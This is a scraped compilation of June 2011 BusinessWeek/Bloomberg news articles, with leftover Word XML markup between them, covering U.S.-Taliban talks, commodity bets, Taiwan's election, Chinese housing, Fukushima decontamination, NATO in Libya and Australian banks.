from Afghanistan the Pakistani military might demand in exchange for pushing the Taliban into a peace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Karzai visited Pakistan for talks with its leaders. He and Pakistani Prime Minister Yousuf Raza Gilani joined the first meeting of an Afghan-Pakistani commission that will help work for reconciliation. Gilani said then that Pakistan supports a reconciliation process that must be "Afghan-owned and Afghan-led."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Catherine Larkin in Washington.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James Rupert in New Delhi at jrupert3@bloomberg.net. Eltaf Najafizada at enajafizada1@bloomberg.net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God's MBAs: Why Mormon Missions Produce Leaders Want to Live Cheaply? Head to Texas How Talbots GrewБ─"and LostБ─"Its Customers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Competitiveness U.S. Auto Sales U.S. Energy Policy U.S. Manufacturing U.S. Economic History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21:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/u-s-confirms-taliban-talks-as-karzai-sees-pakistan-role.html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Funds Trim Bullish Commodity Bets as Global Growth May Decline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12:54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World Faces Century of Hunger Without Farm Deal, France Says Food Prices to Stay High This Decade on Demand, Slowing Output Rice May Drop as FAOБ─(tm)s Calpe Predicts Abundant World Supply Smithfield May Seek Packaged-Meat Deals After Campofrio Food Gold Rises on Demand for Haven From Beleaguered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Yi Tian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Funds reduced bullish bets on commodity prices for the first time in four weeks as Greek's debt crisis spurred speculation that global growth will decline, curbing demand for raw materials.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Speculators cut their net-long positions in 18 U.S. commodities by 0.9 percent to 1.3 million futures and options contracts in the week ended June 14, government data compiled by Bloomberg show. That's the first drop since May 17. Declines were led by a 63 percent plunge in bets on rising wheat prices. Natural gas holdings tumbled 41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&amp; Poor's GSCI Index of 24 raw materials slumped 4.7 percent last week, the first loss since early May. The International Monetary fund lowered its forecast for U.S. growth in 2011 on June 17, saying that weaker growth in the country along with "challenges in the euro area periphery pose greater downside risks" to worldwide expansion.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question is whether the global economic slowdown will result in weaker demand for agricultural commodities," said James Dailey, who manages $200 million at TEAM Financial Management LLC in Harrisburg, Pennsylvania. Fund holdings may decline again next week,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pulled $973 million out of commodity funds in the week ended June 15, according to EPFR Global, a Cambridge, Massachusetts-based researcher. That's the biggest outflow since mid-May, EPFR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Wheat Bets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Managed-money funds and other large speculators reduced bullish bets on wheat prices by 12,896 contracts to 7,558. That was the biggest decline since investors were net-short in November.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Wheat futures for September delivery tumbled 9.9 percent last week, the most for the contract since mid-March. Russia, once the world's second- largest shipper, plans to remove an export ban on July 1, boosting speculation that global supplies will be ample.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"You've got the prospects of a big Russian crop, with them back out exporting again," Tomm Pfitzenmaier, a partner at Summit Commodity Brokerage in Des Moines, Iowa, said on June 16. "The whole thing looks pretty negative."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still have surged 48 percent in the past year as adverse global weather threatened crops. Corn has jumped 74 percent, and soybeans have gained 44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measure of net-long positions in 11 U.S. farm goods rose by 0.6 percent in the week ended June 14, the fourth straight increase. Wagers on rising corn prices gained 5.4 percent. Sugar holdings jumped 25 percent, and bullish cocoa bets more than quadrupled.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Whitney McFerron in Chicago. Editors: Millie Munshi, Daniel Enoch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Yi Tian in New York at ytian8@bloomberg.net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Steve Stroth at sstroth@bloomberg.net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Andy Grove: How America Can Create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Global Macro International Monetary Fund (IMF) Global Economy Investing in Commodities Investing in Growth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20:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/funds-trim-bullish-commodity-bets-as-global-growth-may-decline.html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 Picks Wu for Running Mate as Taiwan Opposition Support Grows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12:17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Existing Home Market Cools in May Amid Government Curbs Beijing May New Home Prices Rise 2.1% From Year Ago, Agency Says China Wealth Fuels Hong Kong Home Price Surges, Tsang Says Consumer Spending Fades in China Economy After Б─≤Peak DaysБ─(tm) Russia, China May Sign Gas Deal Later in Year Amid Wrangling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Tim Culpan and Janet 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Taiwan President Ma Ying-jeou named Wu Den-yih as running mate for his re-election bid, betting the more-popular incumbent premier will help him stave off growing support for the opposition in next year's election.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a former mayor of southern Kaohsiung City, was appointed premier in September 2009. He replaces current Vice President Vincent Siew who announced last month he won't stay for a second term. The Jan. 14 election will pit Ma and Wu, from the ruling Kuomintang, against the Democratic Progress Party's Tsai Ing-wen, who has yet to announce her running mate.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60, faces declining support as backing for his pro- China policy weakens and the DPP gains with its pro-independence platform. Wu has maintained his popularity as premier and may help the KMT win back voters in southern Taiwan where the opposition is favored.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he is from the grassroots and held local positions for a long time, he has a good understanding of local people." Ma said at a press conference yesterday to announce Wu's appointment. "He has a compassion for citizens that's a very important characteristic for those of us in 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63, had a job-approval rating of 38.5 percent in May, higher than Ma's 33.9 percent, according to the Global Views Monthly research centre. His disapproval rating stands at 48.2 percent, according to the May poll of 1,002 people with a margin of error of 3.1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served as mayor of Kaohsiung for two terms from 1990 to 1998, and was also a legislator from 2002 to 2009. He was the general secretary of the KMT from February 2007 to October 2007.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Taipei Council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worked as a journalist after graduating from the National Taiwan University and before being elected a member of the Taipei City council at 25. After serving for eight years, he returned to his home in Nantou County in central Taiwan and became the county magistrate from 1981 to 1989.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also KMT chairman, returned his party to power in 2008 after the DPP's eight years in office saw increased tensions with China, Taiwan's largest trading partner and biggest political rival. The KMT had ruled Taiwan for more than 50 years after retreating to the island following the party's defeat at the hand of Mao Zedong's communists.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Though political rivals, the KMT and Communist Party are united in their one-China policy, while local Taiwanese like Tsai have increasingly sought international recognition of Taiwan's independent status. Ma's administration has signed 15 economic agreements with Beijing in a policy that Tsai has derided as "boxed in a frame set by China."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Cross-Strait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for Ma's initiatives have faded in the past two years, with 32.3 percent of respondents in the Global Views Monthly poll last month considering his Cross-Strait policy a "failure," compared with 24.2 percent in May 2009, while 49.9 percent view it as a "success," from 53.4 percent two years earlier.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Tsai, 54, who separately held posts of vice premier and Mainland Affairs Council chairwoman during Chen Shui-bian's 2000-2008 administration, has benefited from the discord among Taiwanese voters, according to a May survey by the TVBS Polling Center.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would gain 45 percent of votes to Tsai's 44 percent, the TVBS survey of 1,006 people conducted May 16 to 19 showed. Tsai's support surpassed Ma's among those aged 20-39, and in southern Taiwan, according to the poll, which had a 3.1 percent margin of error.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2008 presidential election, the KMT beat the DPP 58 percent to 42 percent by pledging direct flights to China, lifting of investment restrictions by Taiwanese companies and allowing more Chinese visitors to travel to Taiwan.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regards Taiwan as part of its territory and has threatened to attack if it declares formal independence. Taiwan will hold legislative elections concurrently with the presidential ballot.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Paul Tighe, Jim McDonald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Tim Culpan in Taipei at tculpan1@bloomberg.net. Janet Ong at jong3@bloomberg.net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Andy Grove: How America Can Create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Investing in Growth Stocks Bottom Up Growth Mom-Owned Businesses SaaS Senior Care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20:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/ma-picks-wu-for-running-mate-as-taiwan-opposition-support-grows.html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Existing Home Market Cools in May Amid Government Curbs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12:17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New Home Prices Gain in 67 Out of 70 Cities on Year Beijing May New Home Prices Rise 2.1% From Year Ago, Agency Says Asia Housing Boom Stalls as Tightening Puts Brake on Prices Consumer Spending Fades in China Economy After Б─≤Peak DaysБ─(tm) China Sovereign Wealth Fund May Name New Co-Head, Executives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China's effort to cool home prices is damping the market for existing homes, with prices in May falling from the previous month in 23 of 70 cities measured.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more than the 16 cities that posted declines in April, data from the National Bureau of Statistics posted to its website June 18 showed. Existing home prices in Beijing fell 0.2 percent from April while those in Shanghai increased 0.2 percent. The price of new homes, typically sold by developers, rose last month in 67 of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in China and Hong Kong are stepping up property curbs amid concern prices are becoming unaffordable. China on June 14 ordered banks to hold more money as reserves for the sixth time in 2011 as it fights to contain inflation.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measures work better in the existing home market because the strict home purchase restrictions effectively restrain some purchasing power," Jeffrey Gao, a Shanghai-based property analyst at Royal Bank of Scotland Plc, said in a phone interview. "Developers on the other hand are not in a rush to cut home prices as they watch the direction of government policies."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slowing home price growth in the market for existing homes may force more property agencies out of business, said Gao. Midland Realty Ltd. said it will close all of its branches that broker existing homes sales and rentals in Shanghai, because the company "isn't optimistic" about the market in the city, China Business News reported on May 9, citing Ding Wei, a company official.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Slower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 increases for new homes slowed last month in big cities such as the capital of Beijing, the statistics bureau said. Efforts to rein in property prices have been focused on the nation's largest urban areas. A total of 29 cities posted increases exceeding 5 percent, down from 33 cities in April, according to the bureau's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New-home prices in Beijing rose 2.1 percent in May from a year earlier, while those in Shanghai climbed 1.4 percent, the statistics bureau said. The biggest gains last month were in smaller cities including Urumqi, Mudanjiang, Lanzhou and Qinhuangdao, which all posted increases of at least 7.7 percent, according to the data. Prices in northeastern China's Dandong rose 9.7 percent in May, the most among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with the previous month, new home prices fell in nine cities in May, the same number as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may cut home prices in the second half of the year after facing a drain on cash flow, Gao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Outlook Cut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developers' outlook was cut to "negative" from "stable" by Standard &amp; Poor's on June 15 on concern tighter credit and further government curbs may lead to rating downgrades in the next year. Property sales may start to slow as the government's policy "starts to bite," leading to price cuts that may drive home prices 10 percent lower in the next 12 months, the credit rating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developers such as China Vanke Co. and China Overseas Land &amp; Investment Ltd. started to cut prices in some Chinese cities, and more may follow suit in the second half of this year, according to Credit Suisse Group AG.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are still watching to see how strict the government's property measures will be before cutting prices," said Shen Jian-guang, a Hong Kong- based economist at Mizuho Securities Asia Ltd., in a phone interview. "The slowdown of existing home prices is showing the government's home purchase restrictions are having some effect."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Kong's home prices are "quite frightening" as growing wealth in China fuels increases of 2 percent a month, the city's Chief Executive Donald Tsang said in an interview in Melbourne June 17. Savills Plc ranks Hong Kong as the world's most expensive place to buy an apartment.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--Bonnie Cao. Editors: Malcolm Scott,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Bonnie Cao in Shanghai at bcao4@bloomberg.net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The U.S. Postal Service Nears Collapse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China Biotechnology First Time Home Buying China's Media China's Environmental Crisis Market Intelligence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20:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/china-existing-home-market-cools-in-may-amid-government-curbs.html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ECB's Trichet Says Widening Imbalances Challenge Policy Makers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12:08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 Officials to Discuss Greek Plan That Skirts Default Risk Merkel Heeds ECB on Greece Saying Bondholder Role Voluntary Draghi ECB Succession Deal Pressures Bini Smaghi to Resign Hunt for Б─≤Holy GrailБ─(tm) Pits ECB Against Naked Banks: Euro Credit Juncker Says ECB Б─≤Red LinesБ─(tm) Must Be Observed on Greek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Jana Randow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European Central Bank President Jean-Claude Trichet said a widening of global imbalances poses challenges for international policy makers.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concern is that after some partial reduction induced by the crisis, global imbalances are starting to widen again," Trichet said today in Kiel, Germany, where he was awarded with the Global Economy Prize of the Kiel Institute for the World Economy. "This raises challenges for international monetary and financial cooperation" and "the global economy has a lot of homework to do if it is to address these challenges."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17-nation euro region doesn't contribute to global imbalances and growth divergences between member countries are "comparable" to those in the U.S., Trichet said. The euro continues to be a stable currency and the euro area "is not a closed shop,"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Jennifer M. Freedman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Jana Randow in Kiel, Germany, at jrandow@bloomberg.net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Craig Stirling at cstirling1@bloomberg.net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Andy Grove: How America Can Create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Energy Policy U. S. Broadband Policy Marketing Challenges European Energy Policy Hewlett-Packard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20:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/ecb-s-trichet-says-widening-imbalances-challenge-policy-makers.html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Taliban-U.S. Talks ‘Very Preliminary,' Defense Chief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12:08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U.S. Confirms Taliban Talks as Karzai Leans Toward Pakistan Role Karzai Says U.S. Holding Talks With Afghan Taliban Guerrillas Pentagon Starts Paring Troops in Afghan War as Drawdown Looms ZawahiriБ─(tm)s Appointment Shows Al-Qaeda Still a Threat, Gates Says Boehner Says Lawmakers May Seek to Deny Libya Mission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Larkin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McCain comments in sixth, 17th paragraphs.)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Talks between U.S. officials and Taliban guerrillas in Afghanistan are "very preliminary," Defense Secretary Robert Gates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State Department has been carrying out the talks on the part of the U.S. and undisclosed other countries for a few weeks, Gates said on CNN's "State of the Union" program broadcast today. Afghan President Hamid Karzai said yesterday that there have been discussions with member of the Taliban who accept Afghanistan's constitution, corroborating recent reports of a peace process.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said his government isn't taking part in the talks. The Taliban militia ruled Afghanistan, harboring the al-Qaeda terrorist network, before being ousted by a U.S.-led invasion after the Sept. 11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 say these contacts are very preliminary at this point," Gates said. "Real reconciliation talks are not likely to be able to make any substantive headway until at least this winter. I think that the Taliban have to feel themselves under military pressure, and begin to believe that they can't win before they're willing to have a serious conversation."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Barack Obama has pledged to fully transfer security duties to the Afghan government by 2014, with the first troop reductions due to be announced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Political Outcome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all said all along that a political outcome is the way most of these wars end," Gates said on CNN. "The question is when and if they're ready to talk seriously about meeting the redlines that President Karzai, and that the coalition have laid down, including totally disavowing al Qaeda."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John McCain, an Arizona Republican and ranking member of the Senate Armed Forces committee, said he believes that members of Congress will support a "modest withdrawal" of 5,000 to 10,000 troops from Afghanistan in the coming months. Waiting until the middle of next year to announce a massive withdrawal would help Obama before the presidential election, McCain said today on ABC's "This Week" program.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strained U.S. relationship with neighboring Pakistan after al-Qaeda leader Osama bin Laden was found hiding there last month is "probably the most frustrating aspect" of efforts to establish order in Afghanistan, McCain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‘Governments Lie'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governments lie to each other," Gates said on CNN. "That's the way business gets done."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Pakistanis need to believe that the U.S. is committed to securing the region if they are going to rein in militant groups on their side of the border, McCain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they think we're willing to see it through with them, I think it's much more likely we'll get their cooperation," McCain said on ABC.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Gates said in Libya, Muammar Qaddafi's troops are beginning to weaken and he will eventually be taken out of power, possibly by being killed. The U.S. will continue to support the NATO-led mission in Libya until that happens, Gates said in interviews on CNN and the "Fox News Sunday" program.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allies are prepared to sustain this," he said on CNN. "I think this is going to end okay. Qaddafi will eventually fail."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Speaker John Boehner, an Ohio Republican, is challenging Obama's use of U.S. troops without Congressional authorization. Boehner has said the House will look at options to force Obama's hand, including cutting off funding for the operation or blocking unrelated White House priorities.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"Cutting off funding in the middle of a military operation when we have people engaged is always a mistake," Gates said today on "Fox News Sunday.'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weariness'' may be leading Republicans to place partisan politics over national security, McCain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Qaddafi remains in power, it could have profound consequences,'' McCain said on ABC. ‘‘There's always been an isolation strain in the Republican Party. But now it seems to have moved more center stage.''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by Eltaf Najafizada and Catherine Dodge and Zaid Sabah Abd Alhamid in Washington.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Larkin in Washington at clarkin4@bloomberg.net.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Andy Grove: How America Can Create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Defense Industry Chief Information Officer (CIO) Obama's Economic Policy China's Internet Ben Bernanke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20:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/taliban-u-s-talks-very-preliminary-defense-chief-says.html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Tepco's Failure at Decontamination Won't Delay Nuclear Solution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11:18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Karzai Says U.S. Holding Talks With Afghan Taliban Guerrillas Tepco Halts Water Decontamination as Cesium Absorption Limited Failure Guru Probes Nuclear Crisis for Lessons Not Culprits QaddafiБ─(tm)s Forces Fire Rockets at Libyan Port City of Misrata Toyota Expects Return to Full North America Output in September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Monami Yui and Tsuyoshi Inajima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Tokyo Electric Power Co. played down concern a solution to its nuclear crisis may be delayed, one day after finding more radiation than expected must be removed from millions of gallons of water before other work can proceed.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Decontamination efforts at the Fukushima Dai-ichi plant were halted June 18 after a filter expected to remove the radioactive element cesium for several weeks exceeded capacity in just five hours. Oil and sludge in the water contained more radiation than expected, Junichi Matsumoto, a spokesman for the utility said yesterday at a press briefing.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Work on a self-contained cooling system has been suspended while the company solves this problem, Matsumoto said, adding that the setback won't delay achievement of a stable cooling status by mid-July.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"Decontamination is the key to solving the problems at the plant," Tadashi Narabayashi, a nuclear engineering professor at Hokkaido University, said yesterday. "They put together equipment from different manufacturers, which may have made the system as a whole vulnerable."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Decontamination of about 105 million liters (28 million gallons) of water in basements and trenches at Fukushima Dai- Ichi was halted after the level of cesium in a filtering unit reached 4.7 millisieverts of radiation. Filters generally need replacement at a level of 4 millisieverts, and the company had expected the unit to last about a month, Matsumoto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should have had a very simple water decontamination system of its own," Narabayashi said. "Then, it's easy to fix or replace a troubled part by themselves."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utility, known as Tepco, on April 17 outlined plans to end within six to nine months the world's worst nuclear crisis since Chernobyl in 1986. The first stage is to reduce radiation levels at the plant within three months and then achieve a so- called cold shutdown where reactor temperatures fall below 100 degrees Celsius (212 degrees Fahrenheit).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said yesterday it would vent pressure from the No.2 reactor building to aid cooling and keep progress on schedule. There would be "limited impact" on the environment from this, Matsumoto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Fukushima plant suffered three reactor meltdowns after the March 11 earthquake and tsunami knocked out power and backup generators, crippling its cooling systems. Japan in April raised the severity rating of the crisis to 7, the highest on an international scale and the same as the Chernobyl disaster.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 Response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has been criticized for its slow response to the accident and for publishing erroneous radiation data, while the government-run Nuclear and Industrial Safety Agency has been blamed for not ensuring the utility heeded warnings that a tsunami could overwhelm the plant's defenses.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utility is now the subject of study by Yotaro Hatamura, appointed by Prime Minister Naoto Kan last month to head a 10- member team conducting an "impartial and multifaceted" investigation into what went wrong and how to prevent a repeat.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 told reporters in Tokyo last week that plant manager Masao Yoshida, said he couldn't imagine such a huge tsunami.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our discussions, I gathered that no one at the plant could imagine that such a tsunami would occur," Hatamura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Compensation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 struggles to shut down the reactors Tepco is also preparing to compensate victims of the disaster, including 50,000 households displaced because of radiation leaks. Japan's Cabinet on June 14 approved a disaster compensation bill to help the utility pay reparations.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largest banks and insurers, including Sumitomo Mitsui Financial Group Inc. and Dai-ichi Life Insurance Co., will provide short- term operating funds to Tokyo Electric, according to local media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government is discussing plans for a fund of several hundred billion yen to finance reconstruction and support families and companies in the disaster-hit prefectures of Fukushima, Miyagi and Iwate, the Nikkei newspaper reported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Fukushima Governor Yuhei Sato reiterated his opposition to restarting Tepco's nuclear reactors in the prefecture, the Asahi newspaper reported yesterday. Sato said he will respect and adhere to the denuclearization outline of a prefectural committee on reconstruction, the newspaper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Municipal authorities in Fukushima City have expanded radiation monitoring to 1,045 spots, from 100 observed earlier, the Yomiuri newspaper said on June 18.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‘Gap'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Minister Banri Kaieda said on June 18 that he may let utilities restart nuclear generators that had been shut for routine maintenance. There are negatives to suspending all nuclear power, Kaieda said, citing an expected "gap" in power supply and demand in Japan's coming summer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 indicated his team will probe whether an earthquake-prone country such as Japan should build its energy policy around nuclear plants. Because of the inherent dangers, it's a mistake to treat the industry as safe,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Chisaki Watanabe, Shunichi Ozasa, Stuart Biggs, Katsuyo Kuwako, Kanoko Matsuyama, Yuki Hagiwara, Taku Kato and Yuriy Humber in Tokyo. Editors: Jim McDonald,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Monami Yui in Tokyo at myui1@bloomberg.net; Tsuyoshi Inajima in Tokyo at tinajima@bloomberg.net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The U.S. Postal Service Nears Collapse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Nuclear Energy AT&amp;T Integrated Business Solutions Social Media Business Failures Virtualization Solutions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19:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/tepco-s-failure-at-decontamination-won-t-delay-nuclear-solution.html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Confirms Taliban Talks as Karzai Leans Toward Pakistan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11:43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Taliban-U.S. Talks Б─≤Very Preliminary,Б─(tm) Defense Chief Gates Says Karzai Says U.S. Holding Talks With Afghan Taliban Guerrillas Lugar Gives Obama Б─≤at BestБ─(tm) Mediocre Grade for Foreign Policy Pentagon Starts Paring Troops in Afghan War as Drawdown Looms ZawahiriБ─(tm)s Appointment Shows Al-Qaeda Still a Threat, Gates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Eltaf Najafizada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The U.S. has made "very preliminary" contacts with Afghan Taliban guerrillas, Defense Secretary Robert Gates said, a day after Afghanistan's president described Pakistan as the key mediator for peace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Hamid Karzai's speech, and a reaction today from U.S. Ambassador Karl Eikenberry, illustrated again recent tensions between the U.S. and the Afghan leader whose government it is supporting. After Karzai criticized the U.S. as an occupying force pursuing its own interests, Eikenberry told students in the western city of Herat that such comments undermine support in the U.S. for its aid and military role there, the New York Times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Karzai's speech shows that he "has lost hope over America's ability to either defeat the Taliban or bring them to some kind of agreement," said Waheed Mujda, a political analyst at the Kabul Center for Strategic Studies, an independent think tank in Kabul.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U.S. congressional leaders pressing President Barack Obama to withdraw a substantial number of troops next month at the start of a promised drawdown, "Karzai is seriously concerned that the U.S. is pulling out of the conflict and is leaning toward working with Pakistan instead of on peace negotiations," Mujda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has vowed to end the U.S. combat role in Afghanistan by 2014, handing over security duties to Afghan forces that the U.S. is training and equipping.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Their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who at times has praised and criticized the international military force in Afghanistan, yesterday told a youth conference in Kabul that the U.S.-led troops "are here for their own national interests." Repeating his criticism of U.S. military tactics that have caused civilian casualties, he said foreign troops "put our lives under their feet and dishonor the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officials often decline to comment on Karzai's criticisms of the American presence, but Eikenberry responded, without naming Karzai, in the speech at Herat University, the Times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State Department officials and envoys from other countries have met Taliban representatives in recent weeks, "real reconciliation talks are not likely to be able to make any substantive headway until at least this winter," Gates said on CNN's "State of the Union" program. "I think that the Taliban have to feel themselves under military pressure, and begin to believe that they can't win before they're willing to have a serious conversation,"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Wars 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all said all along that a political outcome is the way most of these wars end," Gates said on CNN. "The question is when and if they're ready to talk seriously about meeting the redlines that President Karzai, and that the coalition have laid down, including totally disavowing al-Qaeda."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disclosing the U.S.-Taliban talks, Karzai said yesterday his government isn't involved. While he described the U.S. initiative as positive, he cited neighboring Pakistan as the key interlocutor with the guerrillas. "Getting Pakistan's help in peace talks is very important for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military has backed the Afghan Taliban as a proxy force, according to analysts such as Pakistani author Ahmed Rashid and U.S. officials such as Admiral Mike Mullen, chairman of the Joint Chiefs of Staff. Karzai has criticized Pakistan's role in Afghanistan, saying it supports the Taliban in an effort to dominate his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Mujda and other analysts say it is unclear what political concessions from Afghanistan the Pakistani military might demand in exchange for pushing the Taliban into a peace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Karzai visited Pakistan for talks with its leaders. He and Pakistani Prime Minister Yousuf Raza Gilani joined the first meeting of an Afghan-Pakistani commission that will help work for reconciliation. Gilani said then that Pakistan supports a reconciliation process that must be "Afghan-owned and Afghan-led."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James Rupert in New Delhi and Catherine Larkin in Washington.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Eltaf Najafizada at enajafizada1@bloomberg.net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God's MBAs: Why Mormon Missions Produce Leaders How Talbots GrewБ─"and LostБ─"Its Customers The U.S. Postal Service Nears Collapse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 Sales U.S. Competitiveness U.S. Manufacturing U.S. Energy Policy U.S. Economic History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19:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/u-s-confirms-taliban-talks-as-karzai-leans-toward-pakistan-role.html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NATO Probing Libyan Claims of Civilian Deaths in Tripoli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10:39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Yemeni Clerics Seek SalehБ─(tm)s Removal, Elections in 60 Days QaddafiБ─(tm)s Forces Fire Rockets at Libyan Port City of Misrata Qaddafi WonБ─(tm)t Step Down, Russian Envoy Says After Tripoli Talks Syrians Flee Second Northern Town as Army Said to Approach Boehner Says Lawmakers May Seek to Deny Libya Mission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Maher Chmaytelli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details of reported bombing in sixth and seventh paragraphs. See EXTRA and MET for more on regional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NATO said it was investigating reports of the deaths of several civilians in an airstrike on Tripoli in Libya, shortly after confirming it had accidentally bombed a rebel column in Brega.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missile strike early today destroyed a house in the Souk al-Gomaa residential area, killing three people from the same family, the Libyan Jamahiriya Broadcasting Corp. said. NATO said in an e-mailed statement that it was investigating the incident. NATO earlier confirmed that its aircraft mistakenly hit a column of rebel military vehicles on June 16 near the Libyan oil port of Brega.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has looked into reports of an airstrike that hit opposition forces in the area of Brega and can confirm that NATO aircraft hit military vehicles," the North Atlantic Treaty Organization said in a statement on its website today. "We regret any possible loss of life or injuries caused by this unfortunate incident."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Opposition has been growing in the U.S. and Europe to the United Nations- mandated aerial campaign against Muammar Qaddafi's forces, which is intended to protect civilians. Four months after the uprising against Qaddafi began, rebel troops have failed to take and hold strategic towns such as Brega while other cities, such as the rebel-held port city of Misrata, remain under siege by loyalist forces.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Violence in the region has helped push up oil prices, with futures up 22 percent from a year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Diapers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Libyan officials today took reporters to the site of the alleged airstrike to tour the collapsed building. Strewn amidst the rubble were clean clothes and white diapers free of dust. The building appeared to have been unfinished before its collapse and was pock-marked by small holes. Across the street, plastered repairs done to a wall with similar holes were dry.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building is located in a district close to Souk al- Gomaa, where the opposition to Qaddafi says an uprising against him took place in March. It was not possible to independently verify the Libyan claims that the building was destroyed by a bomb.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has conducted strikes in Tripoli in the last 24 hours and we are aware of the allegations made by Libyan state TV and we are looking into the matter," said NATO Spokesman Wing Commander Mike Bracken. "Any reports of civilian casualties are taken very seriously."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Powers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U.S., the White House has come under pressure from politicians including House Speaker John Boehner, who accused President Barack Obama of trying to "conceal" a Justice Department opinion that the U.S. mission in Libya needs congressional authorization to continue.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Ohio Republican released a statement early yesterday after Obama declined in a letter to Boehner to address the Justice Department's Office of Legal Counsel's views on whether the War Powers Resolution of 1973 applies to the mission. The administration produced a report on June 15 saying the U.S. is serving a support role to the NATO-led mission, and is not engaged in the "hostilities" that require the backing of Congress.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may consider setting a cutoff date for its participation in the NATO mission in Libya, Defense Minister Ignazio La Russa said in an interview published yesterday by the daily Corriere della Sera. The move may "serve as a stimulus" to the U.S., France and the U.K. to find a diplomatic solution to the crisis,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Mounting Cost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Treasury Minister Danny Alexander said Britain's military operations in Libya are costing "hundreds of millions" of pounds.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campaign is costing tens of millions, potentially into the hundreds of millions, as it goes on, but that money is coming from the reserve that we have set aside precisely for contingencies such as this," Alexander said in a television interview on Sky News today. "It doesn't have an effect on any other spending."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Scott Hamilton and Mike Harrison in London, and Margaret Talev and James Rowley in Washington. Editors: Digby Lidstone, Andrew Barden.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Maher Chmaytelli in Tripoli at mchmaytelli@bloomberg.net.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Andrew J. Barden at barden@bloomberg.net.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The U.S. Postal Service Nears Collapse A Chip Industry Takes Off in China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 of Law Indian School of Business Religion in the Workplace Future of BRIC Nations Business of Beer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18:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/nato-probing-libyan-claims-of-civilian-deaths-in-tripoli.html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Aussie Banks Seen as Refuge Amid Greek Crisis: Australia Credit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10:19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Australian, N.Z. Dollars Gain as Greek Compromise Boosts Risk AmbaniБ─(tm)s Reliance Said to Hire 18 Banks for $1.09 Billion Loan JapanБ─(tm)s Bond Futures Rise to 6-Month High on Greece Concern JapanБ─(tm)s Five-Year Notes Gain on Greece, U.S. Slowdown Concerns Australia, N.Z. Dollars Fall to 3-Week Lows on Greek Debt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Sarah McDonald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 (Bloomberg) - Bond investors seeking refuge from Europe's sovereign debt crisis are finding Australia's banks safer than their global peers, even after the top four lenders' credit ratings were downgraded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biggest banks, cut one level to Aa2 by Moody's Investors Service, don't own Greek debt and get at least 70 percent of their revenue from Australia, where growth is forecast to outpace the U.S. and the euro region next year. Speculation a Greek default would infect Europe's banking system and slow the global economy is roiling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banks have very limited exposure to Greek sovereign debt and other European peripherals, which helps to explain why they have outperformed of late," said Mark Mitchell, the head of credit at Sydney- based Kapstream Capital, which manages about A$3.9 billion ($4.1 billion). "Investors are getting increasingly concerned about the situation in Greece and the potential contagion effects."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Bondholders demand 198 basis points, or 1.98 percentage points, more than yields on government debt to hold global bank notes, compared with 166 basis points on Australian securities, the widest gap since March, Bank of America Merrill Lynch indexes show. Credit-default swaps insuring debt of 152 banks worldwide, including Bank of America Corp. and HSBC Holdings Plc, are the most expensive relative to contracts on Australian lenders in three months, according to data compiled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 &amp; New Zealand Banking Group Ltd., National Australia Bank Ltd., Westpac Banking Corp. and Commonwealth Bank of Australia had their debt ratings cut by Moody's on May 18 to the third-highest grade.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default by Greece is "almost certain" and could help drive the U.S. economy into recession, Alan Greenspan, former Federal Reserve chairman, said in a June 16 interview with Charlie Rose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Chancellor Angela Merkel said in Berlin June 18 that policy makers must make sure the Greek crisis doesn't infect the rest of the euro region and spark a new global financial crisis. European Union officials are trying to hammer out a bailout package to avoid triggering a default. EU leaders meet on June 23-24, when Spanish Prime Minister Jose Luis Rodriguez Zapatero expects a "political commitment" to aid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region is likely to expand 1.9 percent in 2011, and 1.65 percent in 2012, according to the median estimates of economists surveyed by Bloomberg. In the U.S., where industrial production rose less than forecast in May and the jobless rate climbed to 9.1 percent, growth is estimated to be 2.6 percent this year and 3 percent in 2012. Australia's economy may expand 2.8 percent in 2011 and 4 percent next year, the surveys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Reserve Bank of Australia cash-rate target is the highest in the developed world at 4.75 percent. That compares with the U.S. Fed's range of zero to 0.25 percent, held since December 2008.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Demand for 